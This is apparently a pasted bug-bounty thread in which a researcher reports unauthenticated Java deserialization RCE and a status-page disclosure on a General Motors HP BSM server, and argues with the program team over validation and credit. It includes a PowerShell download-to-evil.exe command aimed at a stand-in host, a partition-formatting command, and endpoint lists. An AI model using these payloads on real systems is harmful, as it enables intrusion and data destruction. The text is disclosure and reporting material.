- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2 Exact uriworkermap -1 0 0 - - - - 0
- [S|E|R] Worker Status for tvWorker
- Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
- ajp13 127.0.0.1 127.0.0.1:21002 0 0 0 0 2 0
- State Acc Err CE RE Wr Rd Busy Max Con LR LE
- OK/IDLE 0 (0/sec) 0 0 0 0 (0 /sec) 0 (0 /sec) 0 0 0 254430
- URI Mappings for tvWorker (2 maps) [Hide]
- Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
- internalsubsomain.was.here.gm.com:80 /tv/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tv/* Wildchar uriworkermap -1 0 0 - - - - 0
- [S|E|R] Worker Status for odbWorker
- Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
- ajp13 127.0.0.1 127.0.0.1:21215 0 0 0 0 2 0
- State Acc Err CE RE Wr Rd Busy Max Con LR LE
- OK/IDLE 0 (0/sec) 0 0 0 0 (0 /sec) 0 (0 /sec) 0 0 2 254426
- URI Mappings for odbWorker (4 maps) [Hide]
- Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
- internalsubsomain.was.here.gm.com:80 /ucmdb-docs/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /ucmdb-ui/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-docs/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-ui/* Wildchar uriworkermap -1 0 0 - - - - 0
- Legend [Hide]
- Name Worker name
- Type Worker type
- Route Worker route
- Act Worker activation configuration
- ACT=Active, DIS=Disabled, STP=Stopped
- State Worker error status
- OK=OK, ERR=Error with substates
- IDLE=No requests handled, BUSY=All connections busy,
- REC=Recovering, PRB=Probing, FRC=Forced Recovery
- D Worker distance
- F Load Balancer factor
- M Load Balancer multiplicity
- V Load Balancer value
- Acc Number of requests
- Sess Number of sessions created
- Err Number of failed requests
- CE Number of client errors
- RE Number of reply timeouts (decayed)
- Wr Number of bytes transferred
- Rd Number of bytes read
- Busy Current number of busy connections
- Max Maximum number of busy connections
- Con Current number of backend connections
- RR Route redirect
- Cd Cluster domain
- Rs Recovery scheduled in app. min/max seconds
- LR Seconds since last reset of statistics counters
- LE Timestamp of the last error
- JK Status Manager Start Page
- Copyright © 1999-2014, The Apache Software Foundation
- Licensed under the Apache License, Version 2.0.
- ---
- 2017-03-11 08:20:18 +0000: @cayce (comment)
- /jkstatus?cmd=dump
- Exposes the webserver root directory as well as internal service ports:
- JK Status Manager for vulnerable.host.gm.com:443
- Server Version: Apache/2.4.16 (Win32) OpenSSL/1.0.1p mod_jk/1.2.40 Server Time: Sat, 11 Mar 2017 03:15:08 Eastern Standard Time
- JK Version: mod_jk/1.2.40 Unix Seconds: 1489220108
- Change format
- [Back to worker list]
- Configuration Data
- This dump does not include any changes applied by the status worker to the configuration after the initial startup
- ServerRoot=E:/HPBSM/WebServer
- ps=\
- worker.list=localAjp, wdeWorker, tvWorker, odbWorker, JKStatus
- worker.localAjp.type=ajp13
- worker.localAjp.port=8009
- worker.localAjp.host=127.0.0.1
- worker.localAjp.connection_pool_size=200
- worker.wdeWorker.type=ajp13
- worker.wdeWorker.port=8010
- worker.wdeWorker.host=127.0.0.1
- worker.wdeWorker.connection_pool_size=120
- worker.odbWorker.type=ajp13
- worker.odbWorker.port=21215
- worker.odbWorker.host=127.0.0.1
- worker.odbWorker.connection_pool_size=120
- worker.tvWorker.type=ajp13
- worker.tvWorker.port=21002
- worker.tvWorker.host=127.0.0.1
- worker.tvWorker.connection_pool_size=25
- worker.JKStatus.type=status
- JK Status Manager Start Page
- Copyright © 1999-2014, The Apache Software Foundation
- Licensed under the Apache License, Version 2.0.
- ---
- 2017-03-11 08:28:05 +0000: @cayce (comment)
- This "status" page is a gold mine ... allowing trusted users unauthenticated access to EDIT system configuration of "Big Data", nice!
- /jkstatus?cmd=edit&from=show&w=localAjp
- JK Status Manager for vulnerable.host.gm.com:443
- [Back to worker view]
- Edit worker settings for localAjp
- Hostname:
- 127.0.0.1
- Port:
- 8009
- Connection Pool Timeout:
- 0
- Ping Timeout:
- 10000
- Connect Timeout:
- 0
- Prepost Timeout:
- 0
- Reply Timeout:
- 0
- Retries:
- 2
- Retry Interval:
- 100
- Connection Ping Interval:
- 0
- Recovery Options:
- 0
- Max Packet Size:
- 8192
- Update Worker
- JK Status Manager Start Page
- Copyright © 1999-2014, The Apache Software Foundation
- Licensed under the Apache License, Version 2.0.
- *******
- /jkstatus?cmd=reset&from=show&w=localAjp
- Is also available but, I don't want to 'reset' without permission.
- ---
- 2017-03-11 08:38:16 +0000: @cayce (comment)
- I just received a 500 when attempting to access status. Are you performing defensive measures? If so, please advise accepted status.
- FYI, if firewalling a single IP is the approach ... new IP gives me 200 just fine ; )
- ---
- 2017-03-11 09:12:08 +0000: @cayce (comment)
- Additional servlet endpoints identified as unauthed remote RCE exploitable:
- (See initial report, PoCs and additional information references)
- /topaz/authorizationcontrol
- /topaz/authorizationmanagment
- ---
- 2017-03-11 09:49:12 +0000: @cayce (comment)
- I'm seeing some new behavior with this server.
- I see the implementation of "WWW-Authenticate: Basic realm="HP BSM"" on the server side which I don't recall logging previously.
- Either way, while making the get unserialized (browser/proxy/script), I do receive the expected "401 Unauthorized". However, while sending serialized payloads, I receive "500 Internal Server Error", the server is still processing the request despite lacking auth. Seems the "WWW-Authenticate" measure is not applied.
- ---
- 2017-03-11 18:09:13 +0000: @cubo (comment)
- Thank you for the additional information. We have validated the jkstatus information disclosure. We are working on validating the RCE component. When you built the payload did you use the groovy serialization payload option for all of the POCs ?
- ---
- 2017-03-11 18:24:13 +0000: @cayce (comment)
- Yeah, groovy gadgets seem to be getting it done but, there's likely other Java serialization attacks.
- I recommend searching the entire system for java ".jar" files, unpack (change extension to zip, unzip) and then grep through them for "new ObjectInputStream".
- ---
- 2017-03-11 19:01:14 +0000: @cayce (comment)
- Access to powershell seems unrestricted, this is hardening 101 for modern Windows systems. It really ought not be available but, since it is; I recommend using it to do your bidding on/from this host.
- ---
- 2017-03-12 02:52:58 +0000: @cayce (comment)
- Re: "We have validated the jkstatus information disclosure."
- 3) Out of Scope
- Missing best practices, information disclosures, use of a known-vulnerable libraries or descriptive / verbose / unique error pages (without substantive information indicating exploitability)
- I'd like to clarify this point. More specifically, my notes tie this endpoint's disclosure directly to the discovery of the additional endpoints /topaz/authorizationcontrol and /topaz/authorizationmanagment). It's important for your team to distinguish between a purely informational disclosure with no impact ("Apache/IIS" disclosure) versus disclosure that has significant impact, especially that of additional vectors. The impact of these "lows" ought to be felt and understood more clearly while in the light of the final attack vectors during the course of your incident response lessons learned meetings.
- Please confirm that your team accepts this "information disclosure" as in-scope and directly responsible for the findings of two additional RCE injection vectors.
- ---
- 2017-03-12 08:11:25 +0000: @cubo (comment)
- We have evaluated your submission and validated the vulnerability that you’ve reported. We are investigating next steps. Thanks again for your submission and for providing proper details.
- ---
- 2017-03-12 09:10:44 +0000: @cayce (comment)
- I would like to know who will be handling disclosure/bounty with HPE. They claim to have had a bounty program in the past but, I can't find any evidence of it's activities currently. I've tried to reach out to support@hackerone.com for several days now but, have been completely ignored without response.
- ---
- 2017-03-12 09:18:53 +0000: @cayce (comment)
- Re: "We have evaluated your submission and validated the vulnerability that you’ve reported"
- Would you please be more explicit about what has been validated. I have reported many vulnerabilities and several exploits.
- Has your team validated the following points of pre-authenticated, remote exploitation leading to remote command execution?
- /tvb/remoteProxy
- /bpi/remoteProxy
- /topaz/authorizationcontrol
- /topaz/authorizationmanagment
- ---
- 2017-03-12 17:43:41 +0000: @cayce (comment)
- I've identified the following endpoints providing unauthenticated, remote access.
- /topaz/download
- /topaz/upload
- Would your team validate or approve fuzzing?
- ---
- 2017-03-12 18:13:07 +0000: @cayce (comment)
- Additional Java deserialization RCE endpoint:
- /topaz/remoteProxy
- ---
- 2017-03-13 01:20:00 +0000: @cubo (comment)
- You have mentioned being able to execute powershell. Do you have a POC for powershell execution through the serialization vector ?
- ---
- 2017-03-13 02:24:17 +0000: @cayce (comment)
- OK based on this question, your gadgets must be working yes? If so, please confirm your findings so that I can better assist your team with this investigation.
- Has your team validated the following points of pre-authenticated, remote exploitation leading to remote command execution?
- /tvb/remoteProxy
- /bpi/remoteProxy
- /topaz/authorizationcontrol
- /topaz/authorizationmanagment
- Yes or No?
- Additionally, we are well past the 24 hour point relevant toward a critical exposure of internal assets. I find the absence of response to my queries a bit disappointing to say the least. Are we working together on this or against each other?
- Please respond to the aforementioned requests ASAP so I can continue to help secure your application better than the vendor that sold it to you.
- 1: Please confirm that your team accepts this "information disclosure" as in-scope and directly responsible for the findings of two additional RCE injection vectors.
- (now three)
- 2: I've identified the following endpoints providing unauthenticated, remote access.
- /topaz/download
- /topaz/upload
- Will your team validate or approve fuzzing?
- 3: Additional Java deserialization RCE endpoint:
- /topaz/remoteProxy
- I've attached a simple PoC using powershell. For a quick roundup of modern powershell abuse techniques, please review anything by harmj0y et al. as well as this blog post by MS:
- https://blogs.msdn.microsoft.com/powershell/2016/09/27/powershell-security-at-derbycon
- ---
- 2017-03-13 02:53:01 +0000: @cayce (comment)
- Here is better one.
- ---
- 2017-03-13 04:54:39 +0000: @cayce (comment)
- I'm seeing activity from the following nodes:
- 173.194.93.9
- 74.125.41.8
- Would you please confirm that these are associated with your investigation and not unknown actors?
- ---
- 2017-03-13 18:12:53 +0000: @cubo (comment)
- We are actively working through the validation process to ensure we capture the root-cause of the issue. That said, we need additional information. Please provide video evidence of successful payload execution and the http response you are receiving when executing to ensure we have everything we need.
- Again, thank you for your patience as we work through this issue. We prioritize all findings based on their criticality and work to resolve them timely stay tuned for updates
- ---
- 2017-03-14 22:50:00 +0000: @cayce (hacker requested mediation)
- I don't know where to begin here ...
- The biggest issue for me is disclosure to the vendor (if the program participant hasn't already). I was under the impression that this is part of the H1 service. Aside from likely getting screwed out of CVEs and any potential bounty cash from the vendor because I was mistaken about the role H1 plays in the responsible disclosure cycle, myself and an unknown number of users (FTE/Contract/Freelance) working on behalf of the program participant are privy to the presence of multiple pre-auth, RCEs. It's been five days, these users could be leveraging these exploits to their own advantage.
- I signed up to H1 to deliver high quality findings as well as reports. This is difficult to do without some teamwork.
- Program Participant:
- The client has ignored most if not all of my requests. They are now asking for video evidence of findings I've not made. I'm quite sure they are confused about something and not sure how to validate what has been reported. Furthermore just now after a quick test, it looks as though they are applying fixes without acceptance of reported vulnerabilities and associated exploits. Is it acceptable that program participants are able to stall while making changes without crediting the researcher?
- H1:
- It's been almost a week already (I sent initial request 3/10, received actual response from Adam Bacchus (adambacchus) with little to no useful information. I've responded a few times to that e-mail (a couple one-liners out of frustrated haste, apologies about that) and I've not gotten much response at all from anyone at H1. I'm hopefully that there is diligent work happening behind the scenes with the vendor? I've read many positive reviews about H1's integrity; I'm hoping I won't be an exception.
- best,
- cayce
- ---
- 2017-03-15 02:28:18 +0000: @cayce (comment)
- What is it that your team doesn't understand how to validate?
- I've was going to attach another PoC but, it looks as though your team is already applying remediation measures before assigning credit. While this is left unclear, I'm not highly motivated to continue testing if the testing environment has changed without notification. If this isn't communicated to your tester, they will likely waste a lot of their time as well as that of your team, unnecessarily.
- Output from a listener:
- The Collaborator server received a DNS lookup of type A for the domain name randomaddress.burpcollaborator.net.
- The lookup was received from IP address 198.208.47.21 at 2017-Mar-14 19:57:25 UTC.
- Output from whois says it's GM:
- $ whois 198.208.47.21
- #
- # ARIN WHOIS data and services are subject to the Terms of Use
- # available at: https://www.arin.net/whois_tou.html
- #
- # If you see inaccuracies in the results, please report at
- # https://www.arin.net/public/whoisinaccuracy/index.xhtml
- #
- #
- # Query terms are ambiguous. The query is assumed to be:
- # "n 198.208.47.21"
- #
- # Use "?" to get help.
- #
- #
- # The following results may also be obtained via:
- # https://whois.arin.net/rest/nets;q=198.208.47.21?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2
- #
- NetRange: 198.208.0.0 - 198.208.255.255
- CIDR: 198.208.0.0/16
- NetName: GM-198-208-C
- NetHandle: NET-198-208-0-0-1
- Parent: NET198 (NET-198-0-0-0-0)
- NetType: Direct Assignment
- OriginAS: AS30383
- Organization: General Motors LLC (GMED)
- RegDate: 1993-06-29
- Updated: 2016-06-14
- Ref: https://whois.arin.net/rest/net/NET-198-208-0-0-1
- OrgName: General Motors LLC
- OrgId: GMED
- Address: 200 Renaissance Center
- City: Detroit
- StateProv: MI
- PostalCode: 48265
- Country: US
- RegDate: 1990-11-16
- Updated: 2016-06-29
- Ref: https://whois.arin.net/rest/org/GMED
- OrgAbuseHandle: GCD2-ARIN
- OrgAbuseName: GM Cyber Defense
- OrgAbusePhone: +1-313-432-2919
- OrgAbuseEmail: abuse@gm.com
- OrgAbuseRef: https://whois.arin.net/rest/poc/GCD2-ARIN
- OrgTechHandle: KARUP2-ARIN
- OrgTechName: Karuppannan, Venkatachalam
- OrgTechPhone: +1-313-667-2256
- OrgTechEmail: venkatachalam.karuppannan@gm.com
- OrgTechRef: https://whois.arin.net/rest/poc/KARUP2-ARIN
- OrgNOCHandle: MER41-ARIN
- OrgNOCName: Rudnick, Micki E.
- OrgNOCPhone: +1-248-303-5079
- OrgNOCEmail: micki.rudnick@gm.com
- OrgNOCRef: https://whois.arin.net/rest/poc/MER41-ARIN
- #
- # ARIN WHOIS data and services are subject to the Terms of Use
- # available at: https://www.arin.net/whois_tou.html
- #
- # If you see inaccuracies in the results, please report at
- # https://www.arin.net/public/whoisinaccuracy/index.xhtml
- #
- This is a good enough indicator that some or all of the payload was executed on GM's system.
- Your team can confirm this with your own host and a gadget using a payload such as:
- powershell.exe -Command "& {wget 'https://spooky.driveby.mom' -OutFile '%TEMP%\evil.exe'}"
- (If this doesn't work for you, you can try several variations depending upon your powershell version. During my testing many of the modern commandlets returned positive results but, your team could just ask the admin or do some host analysis and make an educated guess as to the powershell version.)
- While sniffing traffic on spooky.driveby.mom, you will see your desired traffic/"callback"/beacon.
- Since your team has or is able to attain authorized access to this node, why not just review the system logs for record of execution?
- Would your team test the following payload in a groovy gadget against a DISPOSABLE system?
- ***** ... WARNING ... *****
- DO NOT USE THE FOLLOWING PAYLOAD ON A PRODUCTION SYSTEM!
- ***** ... WARNING ... *****
- powershell.exe -Command "Get-Partition -DiskNumber 1 -PartitionNumber 1 | Format-Volume -Force -FileSystem NTFS"
- ***** ... WARNING ... *****
- DO NOT USE THE FOLLOWING PAYLOAD ON A PRODUCTION SYSTEM!
- ***** ... WARNING ... *****
- After your team is able to confirm execution, they can proceed to escalate beyond protective measures. While under the terms of the bounty agreement, many techniques typically used MAY fall into "out of bounds" range hence, the CONSTANT updates and requests for approval. At anytime your team has the ability to ask for more or less testing. As I've mentioned and your team has yet to acknowledge or authorize, this node has both upload and download service endpoints exposed waiting to be tested; this would be a great starting place for your red team or any other adversaries to begin to escalate toward full persistence. As my hands are tied until your team communicates authorization and I'd like to avoid entrapment, your red team can review the following article from the friendly folks at NetSPI (https://blog.netspi.com). *** Personal Note: Affiliation = none. This group has been around since 2001 (well before HP's imperialism) and has contributed a lot over the years. They also make some tools, maybe check them out for the next product bake-off? *** With a two year old vintage, some bits may be dated but, your red team ought be able to use similar techniques in more modern ways.
- 15 Ways to Bypass the PowerShell Execution Policy:
- https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy
- If your team doesn't care about this production server any longer (considering this is a two year old bug and many more eyes than mine have seen this, you ought not) and would like to communicate authorization for more intrusive (potentially destructive) testing, just say the word! Once your team confirms authorization for further testing against this production system or provides an alternative test system, we can take the gloves off.
- A video? Really? Based on displayed comprehension to date, I think videos would just prove to create more confusion for your team. Here your team can find some well produced videos for review:
- http://www.securitytube.net
- Honestly, if I thought a video would help you somehow, I might consider throwing more good time at this bad problem but ...
- https://www.youtube.com/watch?v=a3WcuvL737A
- Producing accurate, artifact free, high quality videos is time consuming (I've wasted several hours on this response alone). I've done my best to be patient and as helpful as I can be yet, your team has ignored me at every step of the way and I'm not in the habit of rewarding bad behavior. Rewarding bad behavior is exactly what has ultimately lead to this compromise. If your team MUST have a video for the holiday party, I'll do my best to create something educational but, only when we get on the same page and I am certain your team understands the mechanics of the attack vector.
- Lastly, your request for evidence seems out of scope from my perspective since, I've not made any claim to be able to generate outbound traffic using the HTTP protocol. I could try to generate outbound HTTP traffic if you like but, I think bounty programs aren't as much of a penetration test exercise as they are an application/service review. Are you requesting I perform a penetration test against your firewalls? If so, please confirm. *** Disclaimer: No affiliation or contact *** If your organization is seeking "Hacker-Powered Application Security AND Penetration Testing" bounty service, you might want to contact the self acclaimed "Crowd Security Intelligence" group Synack (https://www.synack.com). My impression of the intent of most bounty programs is that they exist to identify and fix vulnerabilities as well as their associated exploits in products and services; not to secure an entire enterprise. Currently, any unknown pre-authenticated user has access to execute code on your system and generate a "callback". Exploitation will occur under the context of the service performing the callback which, in your case is likely Admin or SYSTEM level. Nice right? I guess you're cool with that, I would not be if I were admin.
- P.S. - Additional finding:
- Unnecessary services installed and running.
- Sure, I see it's filtered and yet to identify exploitability but, c'mon 2005 is calling ... is NetBIOS still a thing for this host? I've yet to see a single sign of hardening performed for this host, feels more like a honeypot more than it does a production server.
- $sudo nmap -O --osscan-guess vulnerable.host.gm.com
- 139/tcp filtered netbios-ssn
- How to: Disable NetBIOS over TCP/IP
- Updated: 5 December 2005
- Servers in the perimeter network should have all unnecessary protocols disabled including NetBIOS. Web servers and Domain Name System (DNS) servers do not require NetBIOS. This protocol should be disabled to reduce the threat of user enumeration.
- The WINS tab of the Advanced TCP/IP Settings dialog box contains a Disable NetBIOS over TCP/IP option. Selecting this option only disables the NetBIOS Session Service (which listens on TCP port 139). It does not disable NetBIOS completely.
- (https://technet.microsoft.com/en-us/library/ms143696(v=sql.90).aspx)
- [Please excuse typos, I'm sick of proofing this]
- ---
- 2017-03-16 11:29:22 +0000: @cayce (comment)
- I'm receiving the following for all of the endpoints I just checked:
- 502 - Web server received an invalid response while acting as a gateway or proxy server.
- There is a problem with the page you are looking for, and it cannot be displayed. When the Web server (while acting as a gateway or proxy) contacted the upstream content server, it received an invalid response from the content server.
- It's finally offline! Looks like your team was able to validate the RCE after all. Good job!
- Let me know if you need any further testing performed.
- ---
- 2017-03-17 15:39:48 +0000: @cubo (comment)
- We’ve implemented fixes and will keep you updated on final remediation status.
- ---
- 2017-03-21 09:41:08 +0000: @cayce (comment)
- powershell PoC functional break-down:
- (aa1_cmd) (aa1_cmdx) (aa3_fwrite)
- powershell > wget (or something like it depending upon PS version) > File write
- This PoC performs several Easily Identifiable Actions Resulting in Artifacts:
- (or EIARA for short)
- 1: Invokation of remote command(s)/script(s)
- Evidence: host process/user event logs
- 2: IP based web request
- a) HTTP (get it)
- Evidence: wire traffic, server/client process logs
- b) DNS (where to get it)
- Evidence: wire traffic, server/client process logs
- 3: Local file write (%TEMP% or E:/HPBSM/WebServer)
- Evidence: file presence, host process/user event logs
- - Point one is a blindly inferred tautology due to the OR condition for points two and
- three.
- - Point two has been documented to be true by return of DNS artifacts.
- - Point three is inferred to be true upon documented (request/response copy/pasted below)
- return of a 500 server error message (as opposed to a 40*) when request for
- https://vulnerable.host.gm.com/tehgoat.jpg is made.
- (Due to HTTP restrictions, it is believed that this ought have been an empty file. If
- it wasn't empty and someone opened it, sorry 'bout that!)
- As this is/was a production server, I felt it imprudent to perform excessive write/comms attempts (potentially, unintentionally creating further exposure) while working on the particulars of escalation and persistence without explicit consent.
- Arbitrary write access coupled with encrypted exfil channel = game over. Tastes like chicken; how do you like your chicken? Fried, boiled, BBQed, baked, roasted ... etc.
- That said, in an attempt to passively validate and escalate this exposure remotely, the following steps were taken with the goal of triggering additional reference points within alternative defensive mechanisms:
- Attempt to trigger "End-Point"/AV protection:
- "End-Point" defense hype products or even old school AV/FIM ought always be deployed
- properly on production systems (even if only for low-hanging fruit)
- Requests were made for EICAR test file (https://secure.eicar.org/eicar.com.txt) with
- output writing to "evil.exe".
- I may not have dialed in the write directory at first and don't see that I had a
- chance to make record of validation as proven with 500 for tehgoat.jpg. Also, initial
- tests missed the mark on this due to HTTP restrictions. Instead, a more direct route
- is to simply echo the string to output. I revised my payloads but, never came back
- around to it since I saw evidence of write access further along and remediation had begun
- by this point.
- Attempt to trigger egress protection:
- When malware from the 90s calls home, it does so explicitly. Any well defended/monitored
- network will have something functionally equivalent to "split DNS"; any and all
- direct DNS record checking from network clients ought be investigated as either an
- incident or a misconfiguration.
- I was able to generate DNS requests to a domain of my choosing which is doing my bidding.
- DNS requests are typically made to the system assigned DNS server yet, this default
- system behavior can easily be manipulated by a client program to allow for a direct
- query. I changed my payload to support direct DNS requests such as this and in doing
- so, I believe the domain used during this testing was identified by some defense
- mechanism as, hours after use within PoCs this domain started to appear on some very
- unique behavioral blacklists. This could be the result of traditionally weak blacklist
- qualifications (likely) but, I find it an interesting coincidence to say the least.
- Despite not being thrilled about drawing mal-attention toward an innocent domain
- provider, I would be thrilled with a finding of proactive defensive measures being
- effective!
- ---
- 2017-03-21 09:49:33 +0000: @cayce (comment)
- Request:
- GET /tehgoat.jpg HTTP/1.1
- Host: vulnerable.host.gm.com
- Connection: close
- Upgrade-Insecure-Requests: 1
- User-Agent: tehduckneedsmorefloyd v0.9
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Encoding: gzip, deflate, sdch, br
- Accept-Language: en-US,en;q=0.8
- Cookie: JSESSIONID=sfPuoutTTASpacesaucePFFQx
- Response:
- HTTP/1.1 500 Internal Server Error
- Content-Type: text/html;charset=UTF-8
- Server: Microsoft-IIS/8.5
- X-Powered-By: JSP/2.2
- X-Powered-By: ARR/2.5
- Date: Sat, 11 Mar 2017 10:16:08 GMT
- Connection: close
- Content-Length: 6247
- ---
- 2017-03-21 09:57:43 +0000: @cayce (comment)
- While it's likely irrelevant at this point, FWIW my notes indicate that the following end-points likely suffer from the aforementioned deserialization attack vector:
- /filters/CategoriesServlet
- /filters/FiltersServlet
- Feel free to confirm a minimum of six pre-auth, RCEs, if you like.
- ---
- 2017-03-27 18:48:21 +0000: @cayce (comment)
- Good luck with your program!
- ---
- 2017-03-30 17:23:20 +0000: @hackerone-support (external user joined)
- ---
- 2017-04-12 22:38:48 +0000: @cayce (comment)
- Your team's last response was over 26 days ago. It's safe to say that your team has validated, responded, re-mediated without recognition or reward (read stolen my work).
- I'd like to finalize for publishing so, please make any additional comments in a swift manner.
- ---
- 2017-04-13 20:48:07 +0000: @cubo (bug informative)
- We were unable to fully validate RCE but were able to remediate the information disclosure portion of the vulnerability and closed it as such. As noted in our profile our program does not offer bounties. Thanks again for the submission.
- ---
- 2017-05-29 08:18:19 +0000: @cayce (comment)
- Okay jokers, I'm ready to publish my findings. What is the process to make this report publicly visible?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement